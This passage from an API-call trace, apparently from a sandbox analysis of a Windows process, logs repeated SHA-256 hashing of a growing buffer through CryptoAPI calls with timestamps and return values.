phProv=0xceb00*=0x33822bd0) returned 1 [0147.974] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.974] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x960, dwFlags=0x0) returned 1 [0147.974] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.974] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a7d0 [0147.974] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a7d0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a7d0, pdwDataLen=0xceaec) returned 1 [0147.974] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.974] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0147.974] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0147.975] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.975] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x980, dwFlags=0x0) returned 1 [0147.975] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.975] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ac50 [0147.975] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5ac50, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ac50, pdwDataLen=0xceaec) returned 1 [0147.975] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.975] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0147.975] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0147.975] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.975] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0147.975] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.975] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a800 [0147.975] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a800, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a800, pdwDataLen=0xceaec) returned 1 [0147.975] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.975] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0147.975] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.976] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.976] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0147.976] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.976] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b1f0 [0147.976] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e5b1f0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b1f0, pdwDataLen=0xceaec) returned 1 [0147.976] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.976] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.976] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0147.977] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.977] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0147.977] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.977] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b220 [0147.977] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b220, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b220, pdwDataLen=0xceaec) returned 1 [0147.977] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.977] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0147.977] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0147.977] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.977] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0147.978] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.978] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5add0 [0147.978] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5add0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5add0, pdwDataLen=0xceaec) returned 1 [0147.978] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.978] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0147.978] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.978] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.978] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0147.978] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.978] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a9e0 [0147.978] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a9e0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a9e0, pdwDataLen=0xceaec) returned 1 [0147.978] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.978] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.978] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0147.979] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.979] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0147.979] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b250 [0147.979] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b250, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b250, pdwDataLen=0xceaec) returned 1 [0147.979] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.979] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0147.979] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0147.980] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.980] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0147.980] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.980] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aa10 [0147.980] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5aa10, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aa10, pdwDataLen=0xceaec) returned 1 [0147.980] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.980] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0147.980] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.980] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.980] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0147.980] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.980] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b2b0 [0147.981] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5b2b0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b2b0, pdwDataLen=0xceaec) returned 1 [0147.981] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.981] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.981] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0147.981] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.981] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0147.981] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.981] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aa40 [0147.981] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5aa40, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aa40, pdwDataLen=0xceaec) returned 1 [0147.981] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.981] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0147.981] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.982] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.982] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0147.982] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.982] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aa70 [0147.982] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x2, pbData=0x32e5aa70, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aa70, pdwDataLen=0xceaec) returned 1 [0147.982] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.982] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.982] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0147.982] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.983] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0147.983] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.983] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ae90 [0147.983] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e5ae90, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ae90, pdwDataLen=0xceaec) returned 1 [0147.983] CryptDestroyHash (hHash=0x332b7900) returned 1 [0147.983] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0147.983] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0147.983] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.983] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0147.983] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.983] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ab00 [0147.983] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ab00, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ab00, pdwDataLen=0xceaec) returned 1 [0147.983] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.983] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0147.983] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.984] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.984] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0147.984] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.984] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ab30 [0147.984] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ab30, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ab30, pdwDataLen=0xceaec) returned 1 [0147.984] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.984] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.984] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0147.985] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.985] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0147.985] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ac80 [0147.985] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ac80, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ac80, pdwDataLen=0xceaec) returned 1 [0147.985] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.985] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0147.985] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0147.986] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.986] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0147.986] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.986] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ad70 [0147.986] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ad70, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ad70, pdwDataLen=0xceaec) returned 1 [0147.986] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.986] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0147.986] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.987] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.987] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0147.987] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.987] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ae00 [0147.987] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ae00, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ae00, pdwDataLen=0xceaec) returned 1 [0147.987] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.987] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.987] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0147.988] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.988] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0147.988] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.988] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ae30 [0147.988] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5ae30, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ae30, pdwDataLen=0xceaec) returned 1 [0147.988] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.988] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0147.988] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0147.988] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.989] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0147.989] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.989] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aec0 [0147.989] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5aec0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aec0, pdwDataLen=0xceaec) returned 1 [0147.989] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.989] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0147.989] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0147.989] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.989] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0147.989] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.989] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aef0 [0147.989] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e5aef0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aef0, pdwDataLen=0xceaec) returned 1 [0147.989] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.989] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0147.989] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0147.990] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.990] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0147.990] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.990] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5af20 [0147.990] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5af20, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5af20, pdwDataLen=0xceaec) returned 1 [0147.990] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.990] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0147.990] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.991] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.991] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0147.991] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.991] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bc70 [0147.991] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bc70, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bc70, pdwDataLen=0xceaec) returned 1 [0147.991] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.991] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.991] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.991] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.991] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0147.991] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.991] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bb80 [0147.991] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bb80, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bb80, pdwDataLen=0xceaec) returned 1 [0147.991] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.992] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.992] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.992] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.992] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0147.992] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b8b0 [0147.992] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5b8b0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b8b0, pdwDataLen=0xceaec) returned 1 [0147.992] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.992] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.992] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0147.993] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.993] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0147.993] CryptGetHashParam (in: 